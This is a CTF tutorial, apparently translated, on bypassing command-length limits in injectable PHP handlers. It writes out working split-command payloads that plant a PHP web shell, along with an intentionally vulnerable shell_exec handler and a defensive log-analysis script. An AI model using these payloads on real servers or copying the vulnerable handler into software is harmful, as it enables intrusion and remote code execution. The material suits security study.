Preface:
In CTFs you will inevitably run into command-execution functions where the length of the command is limited. Different length limits call for different ways of splitting and joining the command.
1. Arbitrary command execution with 15 controllable characters
The goal is to run:
echo \<?php eval($_GET[1]);?\>>1
Split into commands of at most 15 characters each, appended to the same file:
echo \<?php >1
echo eval\(>>1
echo \$_GET>>1
echo \[1\]>>1
echo \)\;?\>>>1
2. Arbitrary command execution with 7 controllable characters
1>a or w>b creates a file named a or b, respectively.
ls>c writes the file names in the directory to the file c; ls -t>0 writes the file names to the file 0 in reverse chronological order of creation (newest first), one name per line.
A '\' at the end of a line escapes the newline, so the following line is joined to it:
ca\
t
This is equivalent to cat.
For example, this code:
<?php if(strlen($_GET[1])<8){ echo shell_exec($_GET[1]); } ?>
Suppose I want to write <?php echo phpinfo(); to a file. The full command would be:
echo PD9waHAgcGhwaW5mbygpOw== | base64 -d >1.php
It is split into pieces of at most 7 characters each:
w>hp
w>1.p\\
w>d\>\\
w>\ -\\
w>e64\\
w>bas\\
w>=\|\\
w>w=\\
w>gpO\\
w>mby\\
w>aW5\\
w>Ghw\\
w>Agc\\
w>waH\\
w>PD9\\
w>o\ \\
w>ech\\
ls -t>0
sh 0
The files are created in reverse order, last piece first. ls -t>0 lists them newest first, which reverses the order again, so the names are written to the file 0 in the intended order. 0 is then executed as a sh script.
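Seen from the defender's side, the sequence above leaves a recognisable trail in request logs. The following is an added example, not code from the original post: it flags one client's ordered, URL-decoded values of the injectable parameter and rebuilds the command that ls -t and sh would assemble from them. The function names, the threshold of three fragments and the sample values are assumptions made for illustration.

```python
import re

FRAGMENT = re.compile(r"^\w{0,2}>(?!>)(.+)$")  # e.g. w>bas\\ : redirect into a new file name
LISTING = re.compile(r"^ls -t\w*>(\S+)$")       # e.g. ls -t>0 : file names dumped into a script
MAX_LEN = 7                                     # the handler on this page requires strlen < 8

# Constructed sample: parameter values in arrival order, modelled on the payload above.
SAMPLE = [r"w>hp", r"w>1.p\\", r"w>d\>\\", r"w>\ -\\", r"w>e64\\", r"w>bas\\",
          r"w>=\|\\", r"w>w=\\", r"w>gpO\\", r"w>mby\\", r"w>aW5\\", r"w>Ghw\\",
          r"w>Agc\\", r"w>waH\\", r"w>PD9\\", r"w>o\ \\", r"w>ech\\",
          "id", "ls -t>0", "sh 0"]


def shell_unescape(word):
    """Undo backslash escaping the way sh does for an unquoted word."""
    return re.sub(r"\\(.)", r"\1", word)


def analyze(commands):
    """Return (flagged, assembled_command) for one client's ordered values."""
    names, script, executed = [], None, False
    for cmd in commands:
        if len(cmd) > MAX_LEN:          # longer values never reach the shell
            continue
        listing = LISTING.match(cmd)
        if listing:
            script = listing.group(1)   # file that receives the name listing
        elif script is not None and cmd == "sh " + script:
            executed = True             # the listing is run as a script
        elif script is None and (frag := FRAGMENT.match(cmd)):
            names.append(shell_unescape(frag.group(1)))
    # File names ending in a backslash act as line continuations in the script.
    continued = sum(name.endswith("\\") for name in names)
    flagged = executed and continued >= 3
    # ls -t prints the newest name first; sh joins lines that end in a backslash.
    assembled = "\n".join(reversed(names)).replace("\\\n", "")
    return flagged, assembled if flagged else None


if __name__ == "__main__":
    print(analyze(SAMPLE))
```

The rebuilt string is what an incident responder would search for on disk or in process logs; unrelated short commands such as id are ignored.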
3. Arbitrary command execution with 5 controllable characters
ls -t>0 itself exceeds 5 characters, so it has to be assembled first:
>ls\\
ls>a
>\ \\
>-t\\
>\>0
ls>>a
This writes ls -t>0 into the script a. To use it, run sh a directly; your own command is then written with the same logic as in the 7-character case above.
4. Arbitrary command execution with 4 controllable characters
ls -th>f exceeds 4 characters, so it has to be assembled first:
>f\>
>ht-
>sl
>dir
*>v
>rev
*v>0
cat 0
This writes ls -th>f into the script 0. Your own command can then be written as in the 7-character case. Finally, run sh 0 to execute ls -th>f, which writes the command into the script f, and then run sh f.
Note:
>py\\ looks like five characters here, more than the limit of four. That is because in a shell environment you need to type \\ to produce \, whereas when PHP code calls exec, typing a single \ produces \; for example, exec(">py\") works.
The payloads above are all written as they are run in a shell in a Linux terminal, where '\' has to be escaped with another '\' and so becomes '\\'. When injecting into a command-execution function, '\' needs to be escaped with '\'.
Principle behind the payload construction that bypasses the 4-character limit:
An expert has summarized this very clearly; here is the link: https://www.sohu.com/a/208155480_354899